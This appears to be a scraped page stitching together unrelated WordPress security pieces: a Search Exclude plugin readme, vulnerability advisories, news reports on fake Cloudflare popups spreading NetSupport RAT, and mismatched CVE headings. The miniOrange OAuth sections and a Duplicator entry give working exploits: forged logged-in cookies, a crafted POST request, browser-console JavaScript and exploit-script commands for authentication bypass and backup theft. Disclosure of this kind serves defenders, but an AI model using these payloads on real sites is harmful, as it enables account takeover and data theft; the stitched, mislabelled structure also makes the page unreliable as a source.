Authenticated (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Roman Pronskiy's Search Exclude plugin <= 1.2.6 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

With this plugin you can exclude any page, post or whatever from the WordPress search results by checking off the corresponding checkbox on post/page edit page.  
Supports quick and bulk edit.

On the plugin settings page you can also see the list of all the items that are hidden from search.

1.  Upload search-exclude directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Go to any post/page edit page and check off the checkbox Exclude from Search Results if you don’t want the post/page to be shown in the search results

**Does this plugin affect SEO?**

No, it does not affect crawling and indexing by search engines.  
The ONLY thing it does is hiding selected post/pages from your site search page. Not altering SEO indexing.

If you want posts/pages to be hidden from search engines you may add the following snippet to your functions.php:

    function add_meta_for_search_excluded()
    {
        global $post;
        if (false !== array_search($post->ID, get_option('sep_exclude', array()))) {
            echo '<meta name="robots" content="noindex,nofollow" />', "\n";
        }
    }
    add_action('wp_head', 'add_meta_for_search_excluded');
    

Note: already indexed pages will remain indexed for quite a while. In order to remove them from Google index, you may use Google Search Console (or similar tool for other engines).

**Are there any hooks or actions available to customize plugin behaviour?**

Yes.  
There is an action searchexclude_hide_from_search.  
You can pass any post/page/custom\_post ids as an array in the first parameter.  
The second parameter specifies state of visibility in search. Pass true if you want to hide posts/pages,  
or false – if you want show them in the search results.

Example:  
Let’s say you want “Exclude from Search Results” checkbox to be checked off by default  
for newly created posts, but not pages. In this case you can add following code  
to your theme’s function.php:

    add_filter('default_content', 'excludeNewPostByDefault', 10, 2);
    function excludeNewPostByDefault($content, $post)
    {
        if ('post' === $post->post_type) {
            do_action('searchexclude_hide_from_search', array($post->ID), true);
        }
    }
    

Also there is a filter searchexclude_filter_search.  
With this filter you can turn on/off search filtering dynamically.  
Parameters:  
$exclude – current search filtering state (specifies whether to filter search or not)  
$query – current WP\_Query object

By returning true or false you can turn search filtering respectively.

Example:  
Let’s say you need to disable search filtering if searching by specific post\_type.  
In this case you could add following code to you functions.php:

    add_filter('searchexclude_filter_search', 'filterForProducts', 10, 2);
    function filterForProducts($exclude, $query)
    {
        return $exclude && 'product' !== $query->get('post_type');
    }
    

works well for me. I think this is one of those very useful plugins which makes something an expert can do quite easily accessible to novices for free ! Thank you

Super Brilliant Plugin. Helps a lot with SEO + prevents making a mess on the web. Hope you are doing ok. My heart goes out to all suffering in Ukraine. @-/---

I spent an hour trying to hide woocommerce products from my search, added a bunch of code to functions. This baby worked in 30 seconds. Wonderful, thanks!

Simple, light, useful and free. Amazing plugin!

Does the job very well, love the bulk option

Thanks so much for coming up with this. Working in quick edit mode makes it a super star!

Read all 68 reviews

“Search Exclude” is open source software. The following people have contributed to this plugin.

Contributors

**1.2.7**

*   This is a security release. All users are encouraged to upgrade.
*   Fix possible XSS vulnerability.

**1.2.6**

*   Fix compatibility with WordPress 5.5

**1.2.5**

*   Security release. More protection added.

**1.2.4**

*   Security release. All users are encouraged to update.
*   Added filter searchexclude\_filter\_permissions.

**1.2.2**

*   Added action searchexclude\_hide\_from\_search
*   Added filter searchexclude\_filter\_search
*   Fixed Bulk actions for Firefox

**1.2.1**

*   Fixed bug when unable to save post on PHP <5.5 because of boolval() usage

**1.2.0**

*   Added quick and bulk edit support
*   Tested up to WP 4.1

**1.1.0**

*   Tested up to WP 4.0
*   Do not show Plugin on some service pages in Admin
*   Fixed conflict with bbPress
*   Fixed deprecation warning when DEBUG is on

**1.0.6**

*   Fixed search filtering for AJAX requests

**1.0.5**

*   Not excluding items from search results on admin interface

**1.0.4**

*   Fixed links on settings page with list of excluded items
*   Tested up to WP 3.9

**1.0.3**

*   Added support for excluding attachments from search results
*   Tested up to WP 3.8

**1.0.2**

*   Fixed: Conflict with Yoast WordPress SEO plugin

**1.0.1**

*   Fixed: PHP 5.2 compatibility

**1.0**

*   Initial release

CVE-2022-36282: Search Exclude

Broken Authentication vulnerability in yotuwp Video Gallery plugin <= 1.3.4.5 at WordPress.

 Verified

 Fixed

**4.3**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Vulnerable versions

<= 1.3.4.5

PSID 

41d6a29e4231

Classification 

Broken Authentication

OWASP Top 10 

A5: Broken Access Control

Required privilege 

Can be exploited remotely without any authentication.

Publicly disclosed

2022-08-22

**Details**

Broken Authentication leading to cache delete discovered by Muhammad Daffa (Patchstck Alliance) in WordPress Video Gallery plugin (versions <= 1.3.4.5).

**Solution**

Update the WordPress Video Gallery plugin to the latest available version (at least 1.3.5).

**References**

CVE-2022-35726: WordPress Video Gallery plugin <= 1.3.4.5 - Broken Authentication - Patchstack

WordPress Duplicator plugin version 1.4.7.2 suffers from a backup disclosure vulnerability.

    ## Title: WordPress Plugin Duplicator 1.4.7.2 - Unauthenticated Backup Download## Author: nu11secur1ty## Date: 08.23.2022## Vendor: https://wordpress.org/## Software: https://wordpress.org/plugins/duplicator/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2## Description:The WordPress Plugin Duplicator 1.4.7.2 suffers from UnauthenticatedBackup Download, after an update from the 1.4.7.1 version.The attacker can download all archive information from the system byusing this vulnerability!Status: CRITICAL[+] Exploit:```python#!/usr/bin/python# Author nu11secur1tyfrom selenium import webdriverimport timeimport osprint("Test if you can access the directory\n")time.sleep(5)os.system('curl http://pwned-host.com/wordpress/wp-content/backups-dup-lite/')target=input("Give the name of the archive...\n")driver = webdriver.Chrome()driver.get('http://pwned-host.com/wordpress/wp-content/backups-dup-lite/'+ target)```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2)## Proof and Exploit:[href](https://streamable.com/x0cvjh)

WordPress Duplicator 1.4.7.2 Backup Disclosure

Security vendor Sucuri says adversaries are injecting malicious JavaScript into numerous WordPress websites that triggers phony bot-related checks.

Threat actors are spoofing Cloudflare DDoS bot-checks in an attempt to drop a remote-access Trojan (RAT) on systems belonging to visitors to some previously compromised WordPress websites.

Researchers from Sucuri recently spotted the new attack vector while investigating a surge in JavaScript injection attacks targeting WordPress sites. They observed the attackers injecting a script into the WordPress websites that triggered a fake prompt claiming to be the website verifying if a site visitor is human or a DDoS bot.

Many Web application firewalls (WAFs) and content distribution network services routinely serve up such alerts as part of their DDoS protection service. Sucuri observed this new JavaScript on WordPress sites triggering a fake Cloudflare DDoS protection pop-up.

Users who clicked on the fake prompt to access the website ended up with a malicious .iso file downloaded onto their systems. They then received a new message asking them to open the file so they can receive a verification code for accessing the website. "Since these types of browser checks are so common on the web many users wouldn't think twice before clicking this prompt to access the website they're trying to visit," Sucuri wrote. "What most users do not realize is that this file is in fact a remote access trojan, currently flagged by 13 security vendors at the time of this post."

**Dangerous RAT**

Sucuri identified the remote-access Trojan as NetSupport RAT, a malware tool that ransomware actors have previously used to footprint systems before delivering ransomware on them. The RAT has also been used to drop Racoon Stealer, a well-known information stealer that briefly dropped out of sight earlier this year before surging back on the threat landscape in June. Racoon Stealer surfaced in 2019 and was one of the most prolific information stealers of 2021. Threat actors have distributed it in a variety of ways, including malware-as-a-service models and by planting it on websites selling pirated software. With the fake Cloudflare DDoS protection prompts, threat actors now have a new way of distributing the malware.

"Threat actors, particularly when phishing, will use anything that looks legitimate to fool users," says John Bambenek, principal threat hunter at Netenrich. As people get used to mechanisms like Captcha's for detecting and blocking bots, it makes sense for threat actors to use those same mechanisms to try to fool users, he says. "This not only can be used to get people to install malware, but could be used for 'credential checks' to steal credentials of major cloud services (such as) Google, Microsoft, and Facebook," Bambenek says.

Ultimately, website operators need a way to tell the difference between a real user and a synthetic one, or a bot, he notes. But often the more effective the tools for detecting bots get, the harder they get for users to decode, Bambenek adds.

Charles Conley, senior cyber security researcher at nVisium, says that using content spoofing of the kind that Sucuri observed to deliver a RAT is not especially new. Cybercriminals have routinely spoofed business-related apps and services from companies such as Microsoft, Zoom, and DocuSign to deliver malware and trick users into executing all kinds of unsafe software and actions.

However, with browser-based spoofing attacks, default settings on browsers such as Chrome that hide the full URL or operating systems like Windows that hide file extensions can make it harder for even discerning individuals to tell what they're downloading and where it's from, Conley says.

Fake DDoS Protection Alerts Distribute Dangerous RAT

By Waqas
The malware dropped in this attack is the NetSupport RAT which was previously identified in malicious MS Word documents.
This is a post from HackRead.com Read the original post: Attackers using fake Cloudflare DDoS protection popups to distribute malware

A new threat campaign has been discovered by cybersecurity researchers at Sucuri, in which attackers are using fake **Cloudflare DDoS protection** popups to distribute malware.

According to Sucuri’s findings, the attack starts with malicious JavaScript that targets WordPress sites. Users are tricked into downloading malware that leads to the hijacking of their devices.

The victim unknowingly downloads a remote access trojan (**RAT**), which has been flagged by at least thirteen security vendors so far.

**How does the Attack Take Place?**

Researchers noted that attackers hack **poorly protected WordPress websites** and add an obfuscated JavaScript payload. This payload displays a fake DDoS protection page. The visitor is requested to click on a button to bypass the DDoS protection screen, but when clicked, it downloads a file to the computer (‘security\_install.iso).

Then the visitor is asked to open this file, which pretends to be a DDOS GUARD application. There’s a code provided that the victim must enter, and another file appears (security\_install.exe). This file is a Windows shortcut that runs a PowerShell command from the Debug.txt file. Several other scripts are run, and the fake DDoS code is displayed.

However, in the background, the **NetSupport RAT** is installed. This RAT is commonly and extensively used in malware campaigns nowadays. The malicious scripts also download the Raccoon Stealer 2.0- a password-stealing trojan.

Fake Cloudflare page dropping malware

This malware steals cookies, passwords, credit card info, auto-fill data, and a wide range of cryptocurrency wallets. It can also perform file exfiltration and captures screenshots of the victim’s display screen. Regarding the possible threats/dangers of this campaign, here’s what the researchers wrote in their **report**:

> “The infected computer could be used to pilfer social media or banking credentials, detonate ransomware, or even entrap the victim into a nefarious ‘slave’ network, extort the computer owner, and violate their privacy – all depending on what the attackers decide to do with the compromised device.”

**What are DDoS Protection Pages?**

You may often come across DDoS Protection pages while browsing the web. These pages are linked with WAF/CDN services that perform browser performance checks and verify if the site visitor is a human, bot, or part of a **DDoS attack**.

These pages usually don’t affect users as they perform a simple check or request for a skill test before proceeding to their desired website/webpage. But, in the recently discovered campaign, JavaScript injections are used in WordPress sites to create fake DDoS protection popups.

**How to Stay Protected?**

Site admins must always check their WordPress sites’ theme files because this is the most widely exploited feature in this campaign and regularly update the software, use 2FA and strong passwords, and **deploy a firewall**.

Furthermore, it is essential to use a file integrity monitoring system as it can quickly catch JavaScript injections and prevent the website from becoming a malware distribution point.

On the other hand, users should enable strict script blocking settings on the browser and keep in mind that they don’t need to download ISO files as anti-DDoS procedures.

1.  **Google Fended Off Largest Ever Layer 7 DDoS Attack**
2.  **DDoS booter customers received warning letters from Dutch police**
3.  **DDoS App Meant to Hit Russia Infected Phones of Ukrainian Activists**
4.  **Canadian firm VoIP.ms hit by non-stop extortion-based DDoS attacks**
5.  **Tiny Mantis Botnet Can Launch More Powerful DDoS Attacks Than Mirai**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Attackers using fake Cloudflare DDoS protection popups to distribute malware

Authentication Bypass vulnerability in miniOrange WP OAuth Server plugin <= 3.0.4 at WordPress.



The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrator role on the client’s website.

**Let’s check the plugin**

The _mo_get_logged_user_from_auth_cookie() function get logged in user with the following code:

    $auth_cookie = wp_parse_auth_cookie( '', 'logged_in' );
    
    if ( ! $auth_cookie || is_wp_error( $auth_cookie ) || ! $auth_cookie['token'] || ! $auth_cookie['username'] ) {
    	return false;
    }}

We can see from the code that it uses the wp_parse_auth_cookie() function. Which is a completely faulty use in this case, as it does not use authentication. Description of the function:

> Authentication cookie components. None of the components should be assumed to be valid as they come directly from a client-provided cookie value.

It is clearly described that the returned value is not validated. But the plugin doesn’t use any validation.

**Let’s see how we can exploit this vulnerability**

All we have to do is set a logged in cookie that contains the username. The other values can be anything, as there is no validation in the plugin.

The default logged in cookie name is:

    define( 'LOGGED_IN_COOKIE', 'wordpress_logged_in_' . COOKIEHASH );

where the hash is:

    define( 'COOKIEHASH', md5( $siteurl ) );

So in the https://lana.solutions/vdb/miniorange-oauth-server which is a test WordPress website:

57a442d3cd2a47583304a69461f75869, which is the result of the following function:

    echo md5('https://lana.solutions/vdb/miniorange-oauth-server');

If we set the following cookie, we can authenticate ourselves as a test user on the OAuth server:

    wordpress_logged_in_57a442d3cd2a47583304a69461f75869=test%7Canything%7Canything%7Canything;

Let’s try it in the easiest way. I created a JavaScript code for the exploit that set the logged in cookie.

So we can even do this through a browser by opening the server’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-server/, then going to the console and entering the following code:

    document.cookie="wordpress_logged_in_57a442d3cd2a47583304a69461f75869=test%7Canything%7Canything%7Canything";

Then open the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/wp-admin and log in using the Single Sign On button.

**The professional exploit script**

I created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange\_oauth\_server\_plugin\_vdb\_exploit\_with\_selenium.py

How to use:

    python3 miniorange_oauth_server_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --server_url="https://lana.solutions/vdb/miniorange-oauth-server/" --username="test"

Run the above command in the Linux (desktop version) terminal.

How the exploit works step by step:

*   Opens OAuth server website
*   Sets the logged in cookie with the “test” username
*   Opens OAuth client website
*   Click Single Sign On button (so it starts OAuth authentication)

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

CVE-2022-34149: WP OAuth Server (Login with WordPress) by miniOrange WordPress plugin Authentication Bypass

Authentication Bypass vulnerability in miniOrange WP OAuth Server plugin <= 3.0.4 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

WP OAuth Server plugin turns your WordPress site into an OAuth Server. It allows you to login into Rocket Chat, Invision Community, WordPress, Odoo, EasyGenerator, Salesforce, Zapier, Moodle, Edunext, Wickr, Freshdesk, FreshWorks, ServiceNow, Knack database, Circlo.so, Tribe.so, Tribe, Mobilize, Nextcloud, Church Online, iSpring LMS, Nextcloud, Academy of Mine, BoardEffect, TalentLMS, PowerSchool and any other OAuth 2.0 compliant applications using WordPress credentials.

Basically, the OAuth Server plugin allows users to login into applications that are OAuth 2.0 compliant, using their WordPress login credentials. As it’s name suggests, it follows the OAuth 2.0 protocol. Along with that, it also supports OpenID Connect (OIDC), and JWT protocols.

The primary goal of the OAuth Server plugin is to enable Single Sign On so that users do not need to remember username and password for each application.  
Once Single Sign On is enabled, users do not need to store sensitive information to login into different applications.

**LIST OF POPULAR OAUTH CLIENTS SUPPORTED**

*   Rocket.Chat
*   Invision Community (IPB Forum)
*   Odoo
*   WordPress
*   EasyGenerator
*   Salesforce
*   Zapier
*   Moodle
*   Edunext
*   Wickr
*   Freshdesk
*   FreshWorks
*   ServiceNow
*   Knack database
*   Circle.so
*   Tribe.so
*   Mobilize
*   Nextcloud
*   iSpring LMS
*   Church Online
*   Academy of Mine
*   BoardEffect

**WORDPRESS OAUTH / OPENID CONNECT SERVER USE CASES**

*   If you want to use your WordPress site as an Identity Server / OAuth Server / OAuth Provider and use WordPress user’s login credentials to login into your client site / application then you can use this plugin. You can also decide what kind of User data / attributes you want to send while Single Sign On into your client site / application.
*   If you want to login to your Mobile app / Single Page web app (SPA) using your WordPress credentials, then you can use the Authorization code with PKCE flow grant type to achieve your use case.
*   Single set of credentials will be used to login to multiple WordPress websites.
*   You can access the NIGINX resources using NIGINX Authentication. Once you login into your client application using WP OAuth Server credentials, you will get JWT. Your client application can further use it for NGINX Authentication.

**WORDPRESS OAUTH / OPENID CONNECT SERVER FREE VERSION FEATURES**

*   Supports Login with WordPress for Single Client application
*   Protocol Support – OAuth 2.0, OpenID Connect (OIDC)
*   Master Switch – Block / unblock OAuth API calls between OAuth Clients and Server
*   Token Length – Change the access token length
*   Server Response – Sends User ID, username, email, first name, last name, display name in the response
*   Grant types Supported – Authorization Code grant
*   OAuth API Documentation
*   Setup guides to configure the plugin with various OAuth Clients (more coming soon)

**WORDPRESS OAUTH / OPENID CONNECT SERVER PREMIUM VERSION FEATURES**

*   All FREE version features
*   Supports Login with WordPress for Multiple Client applications
*   Server Response – Sends all the profile attributes along with roles, allows to send custom attributes from usermeta table and also customize the attribute names that need to be sent in server response
*   Grant Types Supported : Authorization Code Grant, Implicit Grant, Password Grant, Client Credentials Grant, Refresh Token Grant, Authorization Code grant with PKCE flow
*   Token Lifetime – Configure the access token and refresh token expiry time
*   Enforce State Parameter – Based on client configuration, you can enable or disable state parameter
*   Authorize / Consent prompt – Enable / disable the consent screen
*   Redirect/Callback URI Validation – Enable / disable this feature, based on dynamic redirect to a different pages for certain conditions
*   Multi-Site Support – Use the plugin in WordPress Multisite network environment
*   JWT Signing Algorithm – Supports signing algorithms HSA and RSA
*   Additional endpoints – Provides OpenID Connect Discovery endpoint, Introspection endpoint, OpenID Connect Single logout endpoint  
    A grant is a method of acquiring an access token. Deciding which grants to implement depends on the type of client the end user will be using, and the experience you want for your users.

**WE SUPPORT FOLLOWING GRANTS:**

*   **Authorization code grant** : This code grant is used when there is a need to access the protected resources on behalf of the user on another third party application.
*   **Implicit grant** : This grant relies on resource owner and registration of redirect uri. In authorization code grant users need to ask for authorization and access token each time, but here access token is granted for a particular redirect uri provided by a client using a particular browser.
*   **Client credential grant** : This grant type heads towards specific clients, where access token is obtained by client by only providing client credentials. This grant type is quite confidential.
*   **Resource owner password credentials grant** : This type of grant is used where the resource owner has a trust relationship with the client. Just by using username and password, provided by resource owner authorization and authentication can be achieved.
*   **Refresh token grant** : Access tokens obtained in OAuth flow eventually expire. In this grant type client can refresh his or her access token.
*   **Authorization code grant with PKCE flow** : This grant type is used for public clients like mobile and native apps, Single Page web apps, where there is a risk of client secret being compromised.

**REST API AUTHENTICATION**

Rest API is very much open to interact. Creating posts, getting information of users and much more is readily available.  
It secures unauthorized access to your WordPress sites/pages using our WordPress REST API Authentication plugin .

**From your WordPress dashboard**

1.  Visit Plugins > Add New
2.  Search for OAuth 2.0 server. Find and Install OAuth 2.0 server
3.  Activate the plugin from your Plugins page

**From WordPress.org**

1.  Download OAuth 2.0 server.
2.  Unzip and upload the miniorange-oauth-login directory to your /wp-content/plugins/ directory.
3.  Activate miniOrange OAuth from your Plugins page.

**I need to customize the plugin or I need support and help?**

Please email us at info@xecurify.com or Contact us. You can also submit your query from plugin’s configuration page.

Initial setup was giving my team some issues and we were able to get walked through a drupal to wordpress sso setup with the team at miniorange.

The plugin works without problems, and our Wordpress site's login is now working smooth. Very helpful and capable Support, who has answered in a fast manner. They get directly to the point and answer the questions with rich answers that makes even a (in the context of SSO) less experienced user understand what is happening.

The free version of this plugin worked great for my use case. I had some issues initially that ended up being on the side of my hosting provider, but the support I received by the developers of this plugin was well beyond what I would have expected.

I tried this plugin to link Wordpress with Invision Community (IPS). According to the docs at Invision, there are 2 ways to do this. I chose the first one linking IPS to WP as the server as opposed to IPS acting as the server. My review is based on this experience but I'll try the other way too. It quick and easy to set up, and clearly there's a large amount of work gone into it, but once I'd got the connection configured, that's when I found that the logins expire after just 600 seconds, that's just 10 minutes! According to the support section, it says this is fixed at 3600 seconds, unless you upgrade to the pro. But 10 mins isn't an hour, which would be okay at minimum for a WP site member to browse and compose a comment or review on Gallery images, post in a forum etc in Invision Community forming part of the same site. Secondly, probably 90%+ of this plugin is locked down and almost everything seems to say you need to upgrade to pro. Instead of 7 tabs full of settings and options you can't use, why not create a simpler lite version with a non-intrusive ad for the pro version benefits? If you want a simple Single Sign On OAUTH solution to link your WP user accounts to your IPS accounts and sync basic profile info for the convenience of your visitors but then forget about it, it will do the job but as crippled as it is, this probably isn't what you are looking for, unless you want the pro support and anything beyond the bare minimum.

We were very impressed with the level of support given by the miniorange team. During our development we ran into a few problems due to other plugins and our custom application, which caused problems for logout. However, the miniorange team was great they were quick to respond to our questions and even attended a zoom session with us to help track down the problem. Definitely one of the best plugin authors for support. I've worked with many and these guys are second to none.

We ended up not buying the plugin but we have to admit the pre-sales support was stellar including pro-actively reaching us to help configure it.

Read all 27 reviews

“WP OAuth Server ( Login with WordPress )” is open source software. The following people have contributed to this plugin.

Contributors

**4.0.1**

*   Vulnerability fixes
*   Code improvements

**3.0.4**

*   Token Post Response header already sent warning fix

**3.0.3**

*   Database Query Optimization

**3.0.2**

*   CORS issue fix
*   Added trial option of the premium
*   Licensing page changes

**3.0.1**

*   Added compatibility with WP 5.9
*   Improved performance of website by setting autoload to false

**3.0.0**

*   Support for email attribute in the userinfo endpoint
*   Link to the OAuth API documention
*   Client specific UI improvements

**2.13.8**

*   Security Fixes

**2.13.7**

*   UI improvement – Copy button for endpoints and client credentials
*   Bug fix for supplied\_redirect\_uri
*   Consent screen on every login

**2.13.6**

*   permission\_callback warning fix

**2.13.5**

*   minor bug fixes
*   added copy button to copy the client credentials and endpoints
*   readme update

**2.13.4**

*   minor UI updates
*   added compatibility with WP 5.7

**2.13.3**

*   minor bug fixes
*   fixed compatibility with Brizzy
*   added compatibility with WP 5.6

**2.13.2**

*   minor bug fixes
*   fixed issue with deactivation form
*   added compatibility with WP 5.5

**2.13.1**

*   Added compatibility with WordPress v5.5

**2.13.0**

*   Added UI fixes
*   Updated demo plan fixes
*   Minor bugfixes and compatibility fixes

**2.12.4**

*   Licensing tab fix

**2.12.3**

*   Added fixes for some features
*   Added option to disable authorize screen

**2.12.2**

*   Added Compatibility with WordPress v5.4

**2.12.0**

*   Performance Improvements

**2.11.0**

*   Fixed bug where blank scope led to blank screen
*   Fixed “Deny” button resulting in clicking “Allow”
*   Fixed unaccounted bytes error notice on activation
*   Updated plugin licensing
*   Minor UI Improvements

**2.10.0**

*   Added fixes for Loopback Request failure
*   Updated Endpoints based on REST API and Authorize Consent Screen
*   Minor Bugfixes

**2.9.1**

*   Fixed migration issue

**2.9.0**

*   Fixed bug where bearer access\_token was not recognized.
*   Updated Endpoints

**2.8.2**

*   Updated Installation Steps

**2.8.1**

*   Compatibility changes for miniOrange OAuth Single Sign On

**2.8.0**

*   Updated registration form
*   Advertised Introspection Endpoint

**2.7.0**

*   Added compatibility for WordPress Version 5.2
*   Added fixes for OpenID Connect flow
*   Added fixes for OTP related issue
*   Updated Endpoints
*   Added alternative for Sign Up
*   Advertised Scope Based Response

**2.6.1**

*   Fixed conflicts for function generateRandomString()

**2.6.0**

*   Advertised new features as per new Licensing Plan

**2.5.6**

*   Added Compatibility for Rocket.chat

**2.5.5**

*   Fixed OTP related issue

**2.5.4**

*   Updated Licensing Plan

**2.5.3**

*   Added Visual Tour fixes

**2.5.2**

*   Added bugfixes

**2.5.1**

*   Added missing files

**2.5.0**

*   New Features
*   Major UI Revamp
*   Added Feature Tour

**2.4.0**

*   Compatibility with WordPress 5.1

**2.3.0**

*   Added Feedback Form and Updated UI

**2.2.1**

*   Added support for Invision Community and Rocket.chat

**2.2.0**

*   Updated UI

**2.1.0**

*   Fixed the PHP7.2 Compatibility issue

**2.0.3**

*   Changes in the title

**2.0.2**

*   Added features

**2.0.1**

*   Added support for multiple client

**1.0.1**

*   Initial Release

CVE-2022-34149: WP OAuth Server ( Login with WordPress )

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.



The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.

**Let’s check the plugin**

The mo_oauth_login_validate() function includes the following request handling:

    if ( isset( $_REQUEST['option'] ) and strpos( $_REQUEST['option'], 'mooauth' ) !== false ) {
    
    	$user_email = '';
    	if ( array_key_exists( 'email', $_POST ) ) {
    		$user_email = sanitize_email( $_POST['email'] );
    	}
    	
    	if ( $user_email ) {
    		if ( email_exists( $user_email ) ) { // user is a member
    			$user    = get_user_by( 'email', $user_email );
    			$user_id = $user->ID;
    			wp_set_auth_cookie( $user_id, true );
    		} else { // this user is a guest
    			$random_password = wp_generate_password( 10, false );
    			$user_id         = wp_create_user( $user_email, $random_password, $user_email );
    			wp_set_auth_cookie( $user_id, true );
    		}
    	}
    	wp_redirect( home_url() );
    	exit;
    }

We can see from the code that if we specify $_POST['email'], the plugin will log the user in using the wp_set_auth_cookie() function. No verification or authentication. Nothing.

The other problem with the plugin is that if we give an email address in the request that does not exist in the database, it will create a new user, even if registration on the WordPress website is not enabled.

**Let’s see how we can exploit this vulnerability**

We only need to send a POST request to exploit this vulnerability.

The HTTP request to the https://lana.solutions/vdb/miniorange-oauth-client/ which is a test WordPress website:

    POST /vdb/miniorange-oauth-client/ HTTP/1.1
    Host: lana.solutions
    Content-Type: application/x-www-form-urlencoded
    
    option=mooauth&[email protected]

Let’s try it in the easiest way. I created a JavaScript code for the exploit that sends a POST request:

So we can even do this through a browser by opening the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/, then going to the console and entering the following code:

    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://lana.solutions/vdb/miniorange-oauth-client/', true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onload = function() {
    	window.location.href = 'https://lana.solutions/vdb/miniorange-oauth-client/wp-admin/';
    }
    xhr.send('option=mooauth&[email protected]');

After successful login, the script will redirect us to the WordPress admin.

**The exploit script**

I created a Python script that returns the WordPress logged\_in cookie:

Source: miniorange\_oauth\_client\_plugin\_vdb\_get\_exploit\_cookie.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_get_exploit_cookie.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux terminal.

We get something like this:

    wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6

Then all we have to do is use a cookie, such as JavaScript, in the browser console in the client’s website, which in our case is https://lana.solutions/vdb/miniorange-oauth-client/

    document.cookie="wordpress_logged_in_7c51fdb9c753be4972c4c2d647b5ded1=test%7C1656911674%7C2PsqjZ8FHWAqXOhJFcIU7yQPaQFOwVIpOfdZmQEyavx%7C940bbe2d2e3736724984b401f8f829811e541ffe3eb948f407aeeaae11f423f6"; location.reload();

**The professional exploit script**

I also created a Python script with Selenium that exploits the vulnerability and automatically opens the webpage in Google Chrome:

Source: miniorange\_oauth\_client\_plugin\_vdb\_exploit\_with\_selenium.py

How to use:

    python3 miniorange_oauth_client_plugin_vdb_exploit_with_selenium.py --client_url="https://lana.solutions/vdb/miniorange-oauth-client/" --email="[email protected]"

Run the above command in the Linux (desktop version) terminal.

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Client: https://lana.solutions/vdb/miniorange-oauth-client/

Server: https://lana.solutions/vdb/miniorange-oauth-server/

**Additional tests**

I created a Postman request for exploit: Postman Web – MiniOrange Auth Request

Can be used by anyone after fork. The required variables are stored in the collection.

CVE-2022-34858: OAuth 2.0 client for SSO by miniOrange WordPress plugin Authentication Bypass

Authentication Bypass vulnerability in miniOrange OAuth 2.0 client for SSO plugin <= 1.11.3 at WordPress.

 Verified

 Fixed

**5.9**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 OAuth 2.0 client for SSO

Type

Plugin

Vulnerable versions

 <= 1.11.3

Fixed in

 1.11.4

PSID 

f26589749d3c

CVE ID 

 CVE-2022-34858

Classification 

Bypass Vulnerability

OWASP Top 10 

A2: Broken Authentication

Credits

 Lana Codes

Publicly disclosed

2022-08-02

**Details**

Authentication Bypass vulnerability discovered by Lana Codes in WordPress OAuth 2.0 client for SSO plugin (versions <= 1.11.3).

**Solution**

Update the WordPress OAuth 2.0 client for SSO plugin to the latest available version (at least 1.11.4).

**References**

CVE-2022-34858: WordPress OAuth 2.0 client for SSO plugin <= 1.11.3 - Authentication Bypass vulnerability - Patchstack

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Max Foundry MaxButtons plugin <= 9.2 at WordPress.

 Verified

 Fixed

**4.3**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Find out about vulnerable plugins in your websites for free.

 Scan your website 

Software

 MaxButtons

Type

Plugin

Vulnerable versions

 <= 9.2

Fixed in

 9.3

PSID 

b82d75299e1a

CVE ID 

 CVE-2022-36346

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Credits

 Muhammad Daffa (Patchstack Alliance)

Publicly disclosed

2022-08-02

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were discovered by Muhammad Daffa (Patchstack Alliance) in WordPress MaxButtons plugin (versions <= 9.2).

**Solution**

Update the WordPress MaxButtons plugin to the latest available version (at least 9.3).

**References**

Tag

#wordpress